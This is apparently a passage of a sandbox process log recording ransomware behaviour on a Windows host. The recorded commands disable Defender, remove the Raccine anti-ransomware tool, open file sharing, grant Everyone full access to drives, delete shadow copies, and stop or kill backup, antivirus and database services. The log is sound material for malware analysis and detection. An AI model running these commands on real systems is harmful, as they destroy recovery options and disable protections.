  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3364
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4260
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4412
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4628
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4736
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:4824
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:4920
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:3576
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:3944
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:3928
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:4800
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:4652
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:5152
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:4380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyScheduler /y
    3⤵
    PID:12088
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:4608
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:4484
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:4136
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPUpdateService /y
    3⤵
    PID:14552
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:5092
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start Dnscache /y
  2⤵
  PID:5300
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start Dnscache /y
    3⤵
    PID:5828
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start SSDPSRV /y
  2⤵
  PID:5332
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start SSDPSRV /y
    3⤵
    PID:5900
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:5552
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:5592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:5296
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:5628
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:4836
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:5508
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:6124
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:5472
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:6040
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:5420
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:6020
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start upnphost /y
  2⤵
  PID:5380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start upnphost /y
    3⤵
    PID:5868
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:5260
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:5020
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:4764
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSafeOLRService /y
    3⤵
    PID:14736
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start FDResPub /y
  2⤵
  PID:5736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start FDResPub /y
    3⤵
    PID:5372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  2⤵
  - Drops file in Windows directory
  PID:5776
- - C:\Users\Admin\AppData\Local\Temp\8345FC71-2889-4118-9B53-FAC3CF09C7C9\dismhost.exe
    C:\Users\Admin\AppData\Local\Temp\8345FC71-2889-4118-9B53-FAC3CF09C7C9\dismhost.exe {B773951D-BC68-47D5-B692-40A3568515A1}
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    PID:10156
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c net view
  2⤵
  PID:5804
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:12308
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:5880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:5564
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:5948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:2700
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:6004
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:6064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:6376
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop bedbg /y
  2⤵
  PID:5668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop bedbg /y
    3⤵
    PID:4740
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:5112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:6528
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:5200
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
    3⤵
    PID:10520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SDRSVC /y
  2⤵
  PID:4392
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SDRSVC /y
    3⤵
    PID:12348
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ESHASRV /y
  2⤵
  PID:5892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ESHASRV /y
    3⤵
    PID:12364
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLWriter /y
  2⤵
  PID:6200
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLWriter /y
    3⤵
    PID:12684
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McTaskManager /y
  2⤵
  PID:6804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McTaskManager /y
    3⤵
    PID:14244
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DCAgent /y
  2⤵
  PID:8896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DCAgent /y
    3⤵
    PID:16376
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:11580
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  PID:11572
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  PID:11564
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  PID:11556
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  PID:11548
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  PID:11540
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  PID:11532
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  PID:11524
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  PID:11516
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  PID:11508
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  PID:11500
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  PID:11492
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  PID:11484
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  PID:11476
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  PID:11468
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  PID:11460
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  PID:11452
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  PID:11444
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  PID:11436
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  PID:11428
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  PID:11420
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:11412
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  PID:11404
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  PID:11396
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:11388
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  PID:11380
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:11372
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  PID:11364
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  PID:11356
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  PID:11348
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  PID:11340
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  PID:11332
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  PID:11324
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  PID:11316
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:11308
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  PID:11296
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:11288
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  PID:11276
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  PID:11268
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:9980
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  PID:10568
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  PID:10076
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  PID:10044
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:4256
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  PID:9956
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  PID:11260
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:11252
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  PID:11244
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  PID:11236
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:11228
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:11216
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  PID:11204
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  PID:11196
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:11184
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:11176
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:11164
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  PID:11152
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:11140
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:11128
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:11120
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:11108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCatalogSvc /y
    3⤵
    PID:5268
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop klnagent /y
  2⤵
  PID:11096
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop klnagent /y
    3⤵
    PID:5224
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:11084
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:5884
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:11072
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBrokerSvc /y
    3⤵
    PID:17328
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop kavfsslp /y
  2⤵
  PID:11024
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop kavfsslp /y
    3⤵
    PID:11568
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:11012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:17312
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:11000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBackupSvc /y
    3⤵
    PID:6044
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop KAVFSGT /y
  2⤵
  PID:10992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFSGT /y
    3⤵
    PID:17320
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:10800
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:4740
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:10360
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:15812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:10248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:16508
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:5008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:17360
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:5004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:4168
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:8384
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:6136
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:8344
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:3580
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:8292
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:16368
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:8264
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:6532
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:7356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:6020
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:7220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:5368
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:8160
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:6040
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:8104
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:16464
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:8036
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:16448
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:7984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:17176
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:7892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:16440
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:8884
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
    3⤵
    PID:16472
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:8872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:16416
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AVP /y
  2⤵
  PID:8864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AVP /y
    3⤵
    PID:16424
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:8856
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
    3⤵
    PID:16432
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /
  2⤵
  PID:8848
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
    3⤵
    PID:16360
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:8840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:15328
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Antivirus /y
  2⤵
  PID:8832
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Antivirus /y
    3⤵
    PID:16392
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:8820
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:16336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:8812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:16496
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:8800
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:17392
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PROD /y
  2⤵
  PID:8792
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROD /y
    3⤵
    PID:15316
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:8784
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:15300
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Web Control Service” /y
  2⤵
  PID:8776
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
    3⤵
    PID:15872
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:8768
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:5336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:8756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
    3⤵
    PID:17400
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos System Protection Service” /y
  2⤵
  PID:8748
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
    3⤵
    PID:15628
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:8736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:16488
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:8728
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:17384
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Safestore Service” /y
  2⤵
  PID:8720
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
    3⤵
    PID:15292
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop audioendpointbuilder /y
  2⤵
  PID:8712
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop audioendpointbuilder /y
    3⤵
    PID:15836
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:8704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
    3⤵
    PID:5812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:8696
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:15308
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Message Router” /y
  2⤵
  PID:8684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Message Router” /y
    3⤵
    PID:16344
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop unistoresvc_1af40a /y
  2⤵
  PID:8676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop unistoresvc_1af40a /y
    3⤵
    PID:16400
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:8664
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
    3⤵
    PID:6024
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ARSM /y
  2⤵
  PID:8656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ARSM /y
    3⤵
    PID:4848
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos MCS Client” /y
  2⤵
  PID:8648
- - C:\Windows\system32\net1.exe
